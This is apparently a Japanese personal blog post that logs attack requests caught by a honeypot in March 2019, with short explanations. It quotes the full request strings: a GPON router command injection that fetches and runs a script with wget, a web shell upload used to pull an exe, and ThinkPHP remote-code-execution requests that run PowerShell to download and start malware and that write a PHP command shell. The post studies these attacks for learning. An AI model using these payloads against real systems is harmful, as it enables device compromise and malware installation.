ハニーポット記録(20190331)
2019年3月内でハニーポットで検知したもので個人的に勉強になったものを記載します。
(1)GPONルータの脆弱性悪用
POST /GponForm/diag_Form?images/ HTTP/1.1
User-Agent: Yakuza/2.0
Accept: */*
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://x.x.x.x/gpon+-O+/tmp/fwef;sh+/tmp/fwef`&ipv=0
UAが Yakuza/2.0とはYakuzaの意味が違う意味でどんどん広がっていっている・・。
https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/
(2)WebShellを使ったマルウェアダウンロード
PUT /FxCodeShell.jsp::$DATA HTTP/1.1
GET /FxCodeShell.jsp?view=xxxxxxxxx&os=1&address=http://x.x.x/download.exe HTTP/1.1
Webshellをアップロードさせ、WebShell経由でdownload.exeをダウンロードを試みています。viewパラメータがWebShellにアクセスするためのパスワードになっています。
(3)ThinkPHPの脆弱性を悪用
GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://x.x.x/download.exe','C:/Windows/temp/iiqpccjjmjjpoux8275.exe');start%20C:/Windows/temp/iiqpccjjmjjpoux8275.exe HTTP/1.1
GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]=echo%20^<?php%20$action%20=%20$_GET['xcmd'];system($action);?^>>hydra.php HTTP/1.1
GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://x.x.x/download.exe','C:/Windows/temp/iiqpccjjmjjpoux8275.exe');start%20C:/Windows/temp/iiqpccjjmjjpoux8275.exe HTTP/1.1
ThinkPHPのRCE脆弱性を利用して、download.exeをダウンロードさせ、実行させようとしています。PowerShellでダウンロードさせる方法とhydra.phpに出力させてからダウンロードさせる2パターンの攻撃を2連続でやってきました。
https://www.vulneraresearch.com/index.php/2018/12/24/post-16/
(2)と(3)はIPアドレスや時間帯は全然違いますが、同じdownload.exeをDLさせようとしていました。試しにアクセスしてみたところ(Aguse経由で)、まだ存在しているファイルでした。